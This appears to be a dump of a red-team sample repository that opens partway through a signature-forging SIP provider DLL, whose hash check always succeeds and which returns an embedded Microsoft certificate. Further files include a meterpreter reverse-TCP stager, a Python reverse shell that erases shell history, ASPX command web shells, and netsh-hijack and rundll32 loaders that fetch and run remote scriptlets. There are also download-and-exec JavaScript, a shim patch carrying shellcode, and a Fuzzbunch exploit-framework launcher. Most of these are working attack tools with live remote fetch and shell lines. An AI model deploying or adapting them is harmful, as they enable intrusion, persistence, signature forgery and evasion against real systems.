87 | BOOL WINAPI MyDelSignature(SIP_SUBJECTINFO *pSubjectInfo, DWORD dwIndex) {
88 | UNREFERENCED_PARAMETER(pSubjectInfo);
89 | UNREFERENCED_PARAMETER(dwIndex);
90 | 
91 | return TRUE;
92 | }
93 | 
// Subject-recognition callback, registered as pwszIsFunctionNameFmt2 in DllRegisterServer.
// Claims a file when the text after its last '.' is foo, bar or baz (compared
// case-insensitively) by copying MySIPGUID into *pgSubject; later SIP calls for that file
// are then routed to this provider. Returns FALSE, with ERROR_INVALID_PARAMETER set, when
// either argument is NULL, and FALSE without an error code when the extension is not one
// of the three. Assumes SUPPORTED_EXTENSION_COUNT (MySIP.h, not visible here) is 3 —
// exactly three slots are filled.
94 | BOOL WINAPI IsMyFileExtension(WCHAR *pwszFileName, GUID *pgSubject) {
95 | BOOL bResult;
96 | INT i;
97 | WCHAR *SupportedExtensions[SUPPORTED_EXTENSION_COUNT];
98 | WCHAR *Extension;
99 | 
100 | SupportedExtensions[0] = L"foo";
101 | SupportedExtensions[1] = L"bar";
102 | SupportedExtensions[2] = L"baz";
103 | 
104 | bResult = FALSE;
105 | 
106 | if (pwszFileName && pgSubject) {
107 | Extension = wcsrchr(pwszFileName, '.');
108 | 
109 | if (Extension) {
110 | Extension++;
111 | 
112 | for (i = 0; i < SUPPORTED_EXTENSION_COUNT; i++) {
113 | if (!_wcsicmp(Extension, SupportedExtensions[i])) {
114 | bResult = TRUE;
115 | memcpy(pgSubject, &MySIPGUID, sizeof(GUID));
116 | break;
117 | }
118 | }
119 | }
120 | } else {
121 | SetLastError(ERROR_INVALID_PARAMETER);
122 | }
123 | 
124 | return bResult;
125 | }
126 | 
127 | // Such a beautiful unimplemented function, IMO. This is the jedi mindtrick of hash validation. ;)
128 | // This simply states, "I don't care what the hash of the file is. I say it matches the signature in the certificate."
// Verify callback, registered as pwszVerifyFuncName in DllRegisterServer. Returning TRUE
// unconditionally tells the caller that the file's hash matches the signature's indirect
// data, so any file claimed by IsMyFileExtension validates against whatever certificate
// GetLegitMSSignature hands back. Defender note: the registration CryptSIPAddProvider
// creates names this DLL (GetModuleFileName result) and this export; inventorying SIP
// verify callbacks that resolve to non-Microsoft DLLs is how this class of hijack is found.
129 | BOOL WINAPI AutoApproveHash(SIP_SUBJECTINFO *pSubjectInfo, SIP_INDIRECT_DATA *pIndirectData) {
130 | UNREFERENCED_PARAMETER(pSubjectInfo);
131 | UNREFERENCED_PARAMETER(pIndirectData);
132 | 
133 | return TRUE;
134 | }
135 | 
136 | // Supplies the embedded certificate to WinVerifyTrust.
137 | // Note: An IOC can be easily made from the "LEGITCERT" embedded resource name. 
138 | BOOL WINAPI GetLegitMSSignature(SIP_SUBJECTINFO *pSubjectInfo, DWORD *pdwEncodingType, DWORD dwIndex, DWORD *pcbSignedDataMsg, BYTE *pbSignedDataMsg) { 139 | HRSRC hCertResource; 140 | HGLOBAL hResLoaded; 141 | LPVOID lpResAddress; 142 | DWORD dwResourceSize; 143 | DWORD dwErrorCode; 144 | 145 | dwErrorCode = ERROR_SUCCESS; 146 | 147 | 148 | 149 | if(lstrcmpi((LPCTSTR)pSubjectInfo->pwsFileName,L"C:\\test\\cer\\1.ps1")==0) 150 | { 151 | // MessageBox (NULL,L"Get selected file", (LPCTSTR)pSubjectInfo->pwsFileName,0) ; 152 | 153 | // pSubjectInfo is a required argument. I don't actually use pSubjectInfo 154 | // though since all this PoC does is return the same legit, MS cert. 155 | // pdwEncodingType is a required argument 156 | // dwIndex must be 0 157 | // pcbSignedDataMsg is a required argument 158 | // pbSignedDataMsg can be null 159 | if ((pSubjectInfo == NULL) || (pdwEncodingType == NULL) || (pcbSignedDataMsg == NULL) || (dwIndex != 0)) { 160 | dwErrorCode = ERROR_INVALID_PARAMETER; 161 | goto erroroccurred; 162 | } 163 | 164 | // Get a handle to the legitimate Microsoft certificate embedded in this DLL. 165 | // The certificate was embedded as a resource to facilitate a user swapping it out with another one using a resource editor util. 166 | hCertResource = FindResource(DllModuleAddress, MAKEINTRESOURCE(IDR_BINARY1), L"LEGITCERT"); 167 | 168 | if (hCertResource == NULL) { 169 | dwErrorCode = GetLastError(); 170 | goto erroroccurred; 171 | } 172 | 173 | hResLoaded = LoadResource(DllModuleAddress, hCertResource); 174 | 175 | if (hResLoaded == NULL) { 176 | dwErrorCode = GetLastError(); 177 | goto erroroccurred; 178 | } 179 | 180 | // Get the address of the resource in memory. 
181 | lpResAddress = LockResource(hResLoaded); 182 | 183 | if (lpResAddress == NULL) { 184 | dwErrorCode = ERROR_NOT_ENOUGH_MEMORY; 185 | goto erroroccurred; 186 | } 187 | 188 | dwResourceSize = SizeofResource(DllModuleAddress, hCertResource); 189 | 190 | // Return the size of the resource even if it's zero. The caller should know regardless. 191 | *pcbSignedDataMsg = dwResourceSize; 192 | 193 | // There should always be a resource present of a non-zero size. 194 | if (dwResourceSize == 0) { 195 | dwErrorCode = GetLastError(); 196 | goto erroroccurred; 197 | } 198 | 199 | // The first time this func is called, pbSignedDataMsg is expected to be 200 | // null in order to determine the proper buffer size that the caller needs to allocate. 201 | if ((pbSignedDataMsg == NULL) || (dwResourceSize > *pcbSignedDataMsg)) { 202 | dwErrorCode = ERROR_INSUFFICIENT_BUFFER; 203 | goto erroroccurred; 204 | } else { 205 | // Copy the resource to the signed data msg buffer. 206 | memcpy(pbSignedDataMsg, lpResAddress, dwResourceSize); 207 | } 208 | 209 | erroroccurred: 210 | SetLastError(dwErrorCode); 211 | 212 | // Setting this is necessary in order for AutoApproveHash to ultimately be called. 213 | // Without this set, the returned signature will fail to decode. 
214 | *pdwEncodingType = PKCS_7_ASN_ENCODING | X509_ASN_ENCODING; 215 | 216 | return dwErrorCode == ERROR_SUCCESS; 217 | } 218 | return dwErrorCode; 219 | } 220 | -------------------------------------------------------------------------------- /NodeJS-Downloader.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/NodeJS-Downloader.zip -------------------------------------------------------------------------------- /PageLoad_ghostfile.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" AutoEventWireup="true" validateRequest="false" EnableViewStateMac="false" %> 2 | <%@ Import Namespace="System.Web.Hosting" %> 3 | <%@ Import Namespace="System.Web.Compilation" %> 4 | <%@ Import Namespace="System.IO" %> 5 | <%@ Import Namespace="System.Reflection" %> 6 | <%@ Import Namespace="System.Security.Cryptography" %> 7 | -------------------------------------------------------------------------------- /RunProcessHacker.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/RunProcessHacker.msi -------------------------------------------------------------------------------- /UserAdd.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/UserAdd.msi -------------------------------------------------------------------------------- /XamlToViewState.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/XamlToViewState.zip -------------------------------------------------------------------------------- /a.exe: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | demo 13 | 14 | 15 | -------------------------------------------------------------------------------- /addon.node: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/addon.node -------------------------------------------------------------------------------- /calc.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc.dll -------------------------------------------------------------------------------- /calc.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | demo 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /calc.ppa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc.ppa -------------------------------------------------------------------------------- /calc.ps1: -------------------------------------------------------------------------------- 1 | start-process calc.exe 2 | -------------------------------------------------------------------------------- /calc.xlam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc.xlam -------------------------------------------------------------------------------- /calc2.ps1: -------------------------------------------------------------------------------- 1 | Start-Sleep -Seconds 10 2 | start-process calc.exe 3 | -------------------------------------------------------------------------------- /calc_x64.dll: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc_x64.dll -------------------------------------------------------------------------------- /calcbase64.txt: -------------------------------------------------------------------------------- 1 | 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 2 | -------------------------------------------------------------------------------- /calcexit.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calcexit.dll -------------------------------------------------------------------------------- /calcmutex.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calcmutex.dll -------------------------------------------------------------------------------- /calcmutex_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calcmutex_x64.dll -------------------------------------------------------------------------------- /cliramdisk&imdisk.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/cliramdisk&imdisk.rar -------------------------------------------------------------------------------- /com_zimbra_example_simplejspaction.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/com_zimbra_example_simplejspaction.zip -------------------------------------------------------------------------------- 
/com_zimbra_test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/com_zimbra_test.zip -------------------------------------------------------------------------------- /csv.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 10 | 11 | function myFunction() { 12 | var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 13 | return ""; 14 | } 15 | 16 | 17 | 18 | 19 | 20 | 21 | Node,, 22 | 23 | 24 | 25 | {;} 26 | 27 | 28 | ,, 29 | 30 | 31 | 32 | 33 | 34 | 35 | "" 36 | 37 | \\\: 38 | 39 | .="", 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /csvde.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/csvde.zip -------------------------------------------------------------------------------- /dnscmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/dnscmd.exe -------------------------------------------------------------------------------- /dnscmd.exe.mui: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/dnscmd.exe.mui -------------------------------------------------------------------------------- /download.js: -------------------------------------------------------------------------------- 1 | function base64ToStream(b) { 2 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 3 | var length = enc.GetByteCount_2(b); 4 | var ba = enc.GetBytes_4(b); 5 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 6 | ba = 
transform.TransformFinalBlock(ba, 0, length); 7 | var ms = new ActiveXObject("System.IO.MemoryStream"); 8 | ms.Write(ba, 0, (length / 4) * 3); 9 | ms.Position = 0; 10 | return ms; 11 | } 12 | 13 | h=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 14 | h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt",false); 15 | h.Send(); 16 | 17 | var stm = base64ToStream(h.ResponseText); 18 | -------------------------------------------------------------------------------- /downloadexec.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 18 | 19 | 20 | 21 | 22 | 23 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /downloadexec2.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 31 | 32 | 33 | 34 | 35 | 36 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /downloadexec3.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | 13 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /dumpert.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/dumpert.dll -------------------------------------------------------------------------------- /execCmd.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#"%> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO"%> 4 | 5 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /execUI.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import 
namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO" %> 4 | 5 | 6 | 7 | 64 | 65 | 66 | 67 | Command 68 | 69 | 70 |
71 |
72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 |
Auth Key:
Command:
 
85 |
86 |
87 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /fb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.6 2 | import code 3 | import os 4 | import sys 5 | 6 | from fuzzbunch import env 7 | 8 | """ 9 | Set up core paths 10 | 11 | """ 12 | (FB_FILE, FB_DIR, EDFLIB_DIR) = env.setup_core_paths( os.path.realpath(__file__)) 13 | 14 | """ 15 | Make sure our libraries are setup properly 16 | """ 17 | #env.setup_lib_paths(os.path.abspath(__file__), EDFLIB_DIR) 18 | 19 | """ 20 | Plugin directories 21 | """ 22 | PAYLOAD_DIR = os.path.join(FB_DIR, "payloads") 23 | EXPLOIT_DIR = os.path.join(FB_DIR, "exploits") 24 | TOUCH_DIR = os.path.join(FB_DIR, "touches") 25 | IMPLANT_DIR = os.path.join(FB_DIR, "implants") 26 | #LP_DIR = os.path.join(FB_DIR, "listeningposts") 27 | #EDE_DIR = os.path.join(FB_DIR, "ede-exploits") 28 | #TRIGGER_DIR = os.path.join(FB_DIR, "triggers") 29 | SPECIAL_DIR = os.path.join(FB_DIR, "specials") 30 | 31 | """ 32 | Fuzzbunch directories 33 | """ 34 | LOG_DIR = os.path.join(FB_DIR, "logs") 35 | FB_CONFIG = os.path.join(FB_DIR, "Fuzzbunch.xml") 36 | 37 | from fuzzbunch.edfplugin import EDFPlugin 38 | #from fuzzbunch.edeplugin import EDEPlugin 39 | from fuzzbunch.fuzzbunch import Fuzzbunch 40 | from fuzzbunch.pluginfinder import addplugins, PluginfinderError 41 | from fuzzbunch import exception 42 | from fuzzbunch.daveplugin import DAVEPlugin 43 | from fuzzbunch.deployablemanager import DeployableManager 44 | 45 | def do_interactive(fb): 46 | gvars = globals() 47 | gvars['quit'] = (lambda *x: fb.io.print_error("Press Ctrl-D to quit")) 48 | gvars['exit'] = gvars['quit'] 49 | fb.io.print_warning("Dropping to Interactive Python Interpreter") 50 | fb.io.print_warning("Press Ctrl-D to exit") 51 | code.interact(local=gvars, banner="") 52 | 53 | def main(fb): 54 | #fb.printbanner() 55 | fb.cmdqueue.append("retarget") 56 | while 1: 57 | try: 58 | fb.cmdloop() 
59 | except exception.Interpreter: 60 | do_interactive(fb) 61 | else: 62 | break 63 | 64 | def load_plugins(fb): 65 | fb.io.pre_input(None) 66 | fb.io.print_msg("Loading Plugins") 67 | fb.io.post_input() 68 | addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin) 69 | addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin) 70 | addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin) 71 | addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin) 72 | #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin) 73 | addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager) 74 | # addplugins(fb, "EDE-Exploit", EDE_DIR, EDEPlugin) 75 | # addplugins(fb, "Trigger", TRIGGER_DIR, EDFPlugin) 76 | 77 | @exception.exceptionwrapped 78 | def setup_and_run(config, fbdir, logdir): 79 | # Setup fb globally so that we can debug interactively if we want 80 | global fb 81 | fb = Fuzzbunch(config, fbdir, logdir) 82 | fb.printbanner() 83 | load_plugins(fb) 84 | main(fb) 85 | 86 | if __name__ == "__main__": 87 | setup_and_run(FB_CONFIG, FB_DIR, LOG_DIR) 88 | -------------------------------------------------------------------------------- /helloworld.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | helloworld 5 | 6 | 7 | -------------------------------------------------------------------------------- /katz.txt: -------------------------------------------------------------------------------- 1 | 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 2 | -------------------------------------------------------------------------------- /messagebox.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/messagebox.dll -------------------------------------------------------------------------------- /meterpreter_reverse_tcp.cpp: -------------------------------------------------------------------------------- 1 | #include "Windows.h" 2 | 
#include 3 | #include 4 | 5 | #pragma comment(lib,"WS2_32.lib") 6 | 7 | int reverse_tcp() 8 | { 9 | WSADATA wsData; 10 | if(WSAStartup(MAKEWORD(2,2),&wsData)) 11 | { 12 | printf("WSAStartp fail.\n"); 13 | return 0; 14 | } 15 | 16 | SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0); 17 | SOCKADDR_IN server; 18 | ZeroMemory(&server,sizeof(SOCKADDR_IN)); 19 | server.sin_family = AF_INET; 20 | server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip 21 | server.sin_port = htons(8888); //server port 22 | if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server))) 23 | { 24 | printf("connect to server fail.\n"); 25 | closesocket(sock); 26 | WSACleanup(); 27 | return 0; 28 | } 29 | 30 | u_int payloadLen; 31 | if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen)) 32 | { 33 | printf("recv error\n"); 34 | closesocket(sock); 35 | WSACleanup(); 36 | return 0; 37 | } 38 | 39 | char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE); 40 | char* buffer = orig_buffer; 41 | int ret = 0; 42 | do 43 | { 44 | ret = recv(sock,buffer,payloadLen,0); 45 | buffer += ret; 46 | payloadLen -= ret; 47 | } while (ret > 0 && payloadLen > 0); 48 | 49 | 50 | __asm 51 | { 52 | mov edi,sock; 53 | jmp orig_buffer; 54 | } 55 | 56 | VirtualFree(orig_buffer,0,MEM_RELEASE); 57 | 58 | 59 | } 60 | 61 | BOOL APIENTRY DllMain( HMODULE hModule, 62 | DWORD ul_reason_for_call, 63 | LPVOID lpReserved 64 | ) 65 | { 66 | switch (ul_reason_for_call) 67 | { 68 | case DLL_PROCESS_ATTACH: 69 | reverse_tcp(); 70 | case DLL_THREAD_ATTACH: 71 | case DLL_THREAD_DETACH: 72 | case DLL_PROCESS_DETACH: 73 | break; 74 | } 75 | return TRUE; 76 | } 77 | -------------------------------------------------------------------------------- /msg.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/msg.dll 
-------------------------------------------------------------------------------- /msg_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/msg_x64.dll -------------------------------------------------------------------------------- /netshtest.cpp: -------------------------------------------------------------------------------- 1 | // netshtest.cpp : Defines the entry point for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include "netshtest.h" 6 | 7 | BOOL APIENTRY DllMain( HANDLE hModule, 8 | DWORD ul_reason_for_call, 9 | LPVOID lpReserved 10 | ) 11 | { 12 | switch (ul_reason_for_call) 13 | { 14 | case DLL_PROCESS_ATTACH: 15 | case DLL_THREAD_ATTACH: 16 | case DLL_THREAD_DETACH: 17 | case DLL_PROCESS_DETACH: 18 | break; 19 | } 20 | return TRUE; 21 | } 22 | 23 | DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved) 24 | { 25 | char *command="cmd.exe /c start regsvr32.exe /s /n /u /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"; 26 | WinExec(command,SW_HIDE); 27 | // MessageBox(0, "netsh hijack", "test", MB_OK); 28 | return 0; 29 | } 30 | 31 | -------------------------------------------------------------------------------- /oabextract: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/oabextract -------------------------------------------------------------------------------- /putty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/putty.exe -------------------------------------------------------------------------------- /rar.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/rar.exe -------------------------------------------------------------------------------- /rpcloader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/rpcloader.exe -------------------------------------------------------------------------------- /test: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /test.conf: -------------------------------------------------------------------------------- 1 | !sdbpatch 2 | APP=notepad.exe 3 | DBNAME=notepad calc 4 | # 5 | # Win7x86 6 | # AddressOfEntryPoint:00003689 7 | # Checksum:00039741 8 | # 9 | P:notepad.exe,0x39741 10 | R:notepad.exe,0x3689,fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500 11 | !endsdbpatch 12 | -------------------------------------------------------------------------------- /test.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/test.msi -------------------------------------------------------------------------------- /test.ps1: -------------------------------------------------------------------------------- 1 | $a="rundll32.exe javascript:`"\..\mshtml,RunHTMLApplication `";document.write();GetObject(`"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test`")" 
2 | $msexe="cmd.exe" 3 | $arguments="/c $a" 4 | start-process $msexe $arguments -NoNewWindow 5 | -------------------------------------------------------------------------------- /test1.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | 13 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /test2.cab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/test2.cab -------------------------------------------------------------------------------- /test3.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/test3.msi -------------------------------------------------------------------------------- /testmsi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/testmsi.png -------------------------------------------------------------------------------- /testprocexp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/testprocexp.exe -------------------------------------------------------------------------------- /vbs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /version.txt: -------------------------------------------------------------------------------- 1 | 2 | $host 3 | 4 | -------------------------------------------------------------------------------- /version1.txt: 
-------------------------------------------------------------------------------- 1 | 2 | $host 3 | 4 | -------------------------------------------------------------------------------- /x.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | #!/usr/bin/env python 3 | """ 4 | back connect py version,only linux have pty module 5 | code by google security team 6 | """ 7 | import sys,os,socket,pty 8 | shell = "/bin/sh" 9 | def usage(name): 10 | print 'python reverse connector' 11 | print 'usage: %s ' % name 12 | 13 | def main(): 14 | if len(sys.argv) !=3: 15 | usage(sys.argv[0]) 16 | sys.exit() 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | try: 19 | s.connect((sys.argv[1],int(sys.argv[2]))) 20 | print 'connect ok' 21 | except: 22 | print 'connect faild' 23 | sys.exit() 24 | os.dup2(s.fileno(),0) 25 | os.dup2(s.fileno(),1) 26 | os.dup2(s.fileno(),2) 27 | global shell 28 | os.unsetenv("HISTFILE") 29 | os.unsetenv("HISTFILESIZE") 30 | os.unsetenv("HISTSIZE") 31 | os.unsetenv("HISTORY") 32 | os.unsetenv("HISTSAVE") 33 | os.unsetenv("HISTZONE") 34 | os.unsetenv("HISTLOG") 35 | os.unsetenv("HISTCMD") 36 | os.putenv("HISTFILE",'/dev/null') 37 | os.putenv("HISTSIZE",'0') 38 | os.putenv("HISTFILESIZE",'0') 39 | pty.spawn(shell) 40 | s.close() 41 | 42 | if __name__ == '__main__': 43 | main() 44 | --------------------------------------------------------------------------------